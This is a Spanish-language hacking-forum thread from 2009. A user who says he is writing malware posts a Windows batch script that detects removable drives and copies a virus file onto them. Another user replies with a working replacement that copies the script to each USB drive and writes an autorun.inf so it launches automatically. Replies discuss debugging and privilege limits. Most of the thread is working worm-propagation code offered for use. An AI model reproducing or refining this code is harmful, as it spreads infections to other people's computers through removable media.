Script batch para infeccion a traves de Unidades Extraibles

Iniciado por LauBuru, 29 Marzo 2009, 21:39 PM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

LauBuru

29 Marzo 2009, 21:39 PM Ultima modificación: 30 Marzo 2009, 08:26 AM por LauBuru
Bueno estoy codeando un malware que no estya terminado, e optado por el metodo de propagacion a traves de unidades extraibles (USB,SlimCard,Memory Stick,etc...)
Os dejo un script para detectar e copyar archivos en unidades extraible, pruebenlo haber que les parece, no creo que haya errores pues funciona perfectamente, pero si encuentran algo diganmelo porfa

Un saludo gente    ;D


Código [Seleccionar]
@echo off
echo. > unidad.txt
for %%a in ( A: B: C: D: E: F: G: H: I: J: K: L: M: N: Ñ: O: P: Q: R: S: T: U: V: W: X: Y: Z: ) do (
fsutil fsinfo drivetype %%a >> unidad.txt)
type unidad.txt | find "extra" >unExtra.txt
for /f "tokens=1" %%b in (unExtra.txt) do ( call :infect %%a)
:infect
set pam=%*
copy %systemroot%\system32\virus.bat %pam%\virus.bat || goto :eof
69696969 start notepad.exe ::

Germaniac

#1
30 Marzo 2009, 07:48 AM
La unidad Ñ: no existe y puedes obtener las unidades con
Código [Seleccionar]
fsutil fsinfo drives
Lo probe y sale un mensaje de error que No hay disco en la unidad A: (mi unidad de disquete) porque no tengo ningun disquete dentro.

LauBuru

#2
30 Marzo 2009, 08:32 AM
Ya se que la unidad Ñ no existe pero bueno pues todas las letras porsiaca, antes probe con "fsutil fsinfo drivetype" y "wmic logicaldisk get caption", y para mi este es el metodo mas sencillo, haunque no el mas eficaz pero bueno, poco a poco jejejeje

Un saludo   :)

PD:Modifique el code para evitar esos errores,  ;D
69696969 start notepad.exe ::

SmartGenius

#3
30 Marzo 2009, 16:00 PM
Creo que deberias usa otro medoto que sea factible para cualquier usuario, porque el uso de FSUTIL esta limitado a users con privilegios administrativos...

Código [Seleccionar]

@echo off
for %%a in (C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) do (
for /f "tokens=1" %%b in ('fsutil fsinfo drivetype %%a:^| find "extra"') do (
copy /y "%~0" "%%b:\codigo.bat"&echo.[autorun]>>"%%b:\autorun.inf"&echo.open=codigo.bat>>"%%b:\autorun.inf"))
Goto :Eof


Tambien podrias en el segundo FOR crear un ARRAY con todas las Letras que corresponden a los extraibles y guardarlo como variable para usarlo en cualqueir lado....

Saludos.

LauBuru

#4
30 Marzo 2009, 22:08 PM
Veo que teneis el culo pelao ya en batch, bien bien asi aprendere mas, por cierto smart una pregunta los tokens de for no van de la A a la Z solamente "^" se admitiria y si asi fuera nos habilitaria el poder usar un tokens mas "^ + A-Z" pregunto pk me has dejao mosca  XD


Un saludo makinas   ;D


PD: Para pedir el tipo de unidades, lo puede hacer un user sin pribilegios de administracion (reg query lo puede usar un user normal?)
69696969 start notepad.exe ::
Imprimir
Ir Arriba Páginas1
Acciones del Usuario